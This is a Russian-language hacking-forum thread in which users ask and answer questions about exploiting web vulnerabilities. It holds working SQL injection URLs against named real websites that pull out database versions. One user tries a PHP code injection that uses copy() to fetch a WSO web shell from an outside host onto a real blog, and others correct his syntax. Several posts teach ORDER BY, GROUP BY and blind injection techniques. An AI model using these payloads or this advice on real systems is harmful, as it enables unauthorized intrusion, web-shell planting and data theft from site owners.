Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    hostgator.com

    Как вариант ->
    http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=-20'+union/*!12345+select*/1/*!12345,*/2/*!12345,*/3/*!12345,*/@@version/*!12345,*/5/*!12345,*/6--+

    --

    http://www.bch5.ru

    эрорбейс не самый удобный способ, лучше нормальный вывод:
    http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403 UNION SELECT 13717,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 limit 1,1--+1
     
    5 people like this.
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    13717, что это за число, и как оно находится? объясните или дайте ссылку почитать
     
    #22762 er9j6@, 26 Nov 2013
    Last edited: 26 Nov 2013
  3. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    никак, заместо 13717 может быть любое число
     
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    не любое, например

    http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20SELECT%2013719,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,%2017,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20,34,35,36,37,38,39,40,41,42,43%20limit%201,1--+1

    такой вариант не проходит и почему пятизначное?
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    количесто знаков тут не причём))
    збоку где вывод выводятся баннеры, каждая ссылка имеет свой id, наведи и увидишь, к примеру 9580

    вот если есть баннеры под определённым id - есть вывод, если нету то и вывода нету
     
    1 person likes this.
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Разобрался, например и так выводится

    http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,9580,35,36,37,38,39,40,41,42,43--+
     
  7. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -3
    ниужели никто не знает мой вопрос? я думал тут профи сидят
     
  8. Grifon

    Grifon Elder - Старейшина

    Joined:
    20 Mar 2008
    Messages:
    60
    Likes Received:
    2
    Reputations:
    0
    есть такая ссылка типа http://xxx.com/index.php?a=xxx&b=xxx
    в переменные A и B можно запихнуть javascript код и он выполняется. как дальше можно раскрутить эту уязвимость(кроме пассивной xss)
     
  9. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    PHP inj

    site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}

    Выдает: Account unavailable

    1. В чем ошибка?
    2. Где будет расположен шелл?
    3. Где можно почитать информацию?

    П.с.:

    - http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
    - wso2_pack.php - путь до самого шелла.

    Благодарю.
     
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Я не разбираюсь, но мне кажется надо указать полный путь.
     
    _________________________
  11. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:
    PHP:
    copy('http://site.ru/wso2_pack.txt''./wso2_pack.php');
     
  12. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Если нет запуска процесса, то не выйдет.
     
  13. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Есть иньекция вида:

    Code:
    SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
    Пробую делать так:

    Code:
    SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1

    Но получаю:
    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1' at line 1



    А если делать union select
    Code:
    SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1
    
    то получаю:
    #1221 - Incorrect usage of UNION and ORDER BY

    Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
     
  14. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -3
    Есть сайт который периодически спонтанно выдает такие ошибки:
    Однако морковка (havij) так и не докапалась до бд. Скажите, эти ошибки существенны? и что можно сделать в этом случае.
    иногда появляется на странице по адресу типа http://site.su/index.php?cat=x
     
  15. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Инъекция в ORDER BY.
    Такие инжекты крутите, как блайнд:

    Code:
    SELECT * FROM `data` WHERE name = 'test' ORDER BY id AND IF(SUBSTR(VERSION(),1,1)=5,SLEEP(5),0)
     
  16. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    157
    Likes Received:
    36
    Reputations:
    2
    ex'pert
    SQLmap или руками.
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Дополню ответ, который дал UXOR(может кому будет полезно):

    Для эксплуатации инъекций применяется слепой метод:
    Бинарный поиск всем знаком. Для того, чтобы вытащить 1 символ, нам необходимо послать 8 запросов.
    Code:
    SELECT if(ascii(substr(version(),1,1))<54,1,-1);
    Но недавно предложили более быстрый способ эксплуатации таких инъекций, при котором 1 символ можно вывести за один запрос. Смотрим статью NameSpase Инъекция в ORDER BY: Второе дыхание
    Code:
    ORDER BY if(id < 10, if(id=1,1,(
                if(
                    ascii(mid(user(),1,1)) & pow (2, (id-2)) > 0, 
                        # pow - возведение 2 в степень для получения необходимого числа:
                        #     2^0 = 1 = 00000001
                        #    2^1 = 2 = 00000010
                        #    2^2 = 4 = 00000100
                        # Так-же для этих целий можно использовать побитовый сдвиг
                        #    он и короче, но символы < и > могут фильтроваться
                        #        (Выше они используются для упрощения)
                        # 1 << 4 = 16         # (SELECT 4) >> (SELECT 1) = 2
                    id, -id
            ))), 1000) LIMIT 9;
    Так, что есть пища для размышления.
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Нашёл, вроде как скулю, но что-то есть сомнения..
    Code:
    http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    UXOR, YaBtr, Вы что-то не то советуете.

    Code:
    ORDER BY id[COLOR=DarkOrange]|(SELECT 1 from information_schema.tables group by concat([COLOR=Red](SELECT version())[/COLOR],floor(rand(0)*2)) having min(0))[/COLOR]
    Если бы инъекция была в GROUP BY, то тогда так:
    Code:
    GROUP BY id [COLOR=DarkOrange]is null, concat([COLOR=Red](SELECT version())[/COLOR],floor(rand(0)*2)) having min(0)[/COLOR]

    Unknowhacker, там нет инъекции.
     
    #22779 randman, 29 Nov 2013
    Last edited: 29 Nov 2013
    1 person likes this.
  20. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Можно пример? А т залиться не получается...да и с багами такими первый раз судьбу связал)
    http://blogs.simplefit.ru/recipe/rss/
     
Loading...
Thread Status:
Not open for further replies.